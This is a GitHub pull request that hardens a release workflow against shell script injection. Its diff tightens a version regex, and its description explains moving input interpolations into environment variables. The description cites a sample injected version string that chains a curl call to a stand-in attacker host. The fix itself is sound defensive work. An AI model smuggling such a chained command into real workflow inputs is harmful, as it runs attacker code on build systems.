### PR TITLE
Prevent script injection in release workflow run blocks

### DIFF
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -34,7 +34,7 @@ jobs:
         id: validate
         run: |
           # Validate target-release format
-          if [[ ! "$TARGET_RELEASE" =~ ^[0-9]+\.[0-9]+\.[0-9]+ ]]; then
+          if [[ ! "$TARGET_RELEASE" =~ ^[0-9]+\.[0-9]+\.[0-9]+(-[a-zA-Z0-9.]+)?$ ]]; then
             echo "Error: Invalid target-release format. Expected: X.Y.Z"
             exit 1
           fi


### PR DESCRIPTION
## Summary

All `${{ inputs.* }}` and `${{ steps.*.outputs.* }}` interpolations inside shell `run:` blocks are vulnerable to command injection — a user with workflow dispatch permissions could craft a malicious version string (e.g. `0.0.1; curl evil.com`) that gets executed as shell code.

This PR replaces every direct interpolation in `run:` blocks with environment variables using the `env:` mapping pattern recommended by GitHub's [security hardening guide](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable). Uses of `${{ inputs.* }}` in `with:` blocks (action inputs, checkout ref, etc.) are not affected as those are YAML values passed to actions, not shell-executed.

Addresses the CRITICAL script injection issue (Issue #1) from `.github/RELEASE_WORKFLOW_REVIEW.md`.

## Changes

| File | Change |
|------|--------|
| `.github/workflows/release.yml` | Replace all direct `${{ inputs.* }}` / `${{ steps.*.outputs.* }}` in `run:` blocks with `env:` mappings across `prepare-release`, `package-charts`, and `create-release` jobs |

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Chores**
  * Streamlined release workflow to rely on centralized environment variables for release/version values.
  * Improved consistency of branch, commit/tag naming, and packaging steps across the release pipeline.
  * Ensured release, push, and packaging steps propagate version information reliably for more predictable releases.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->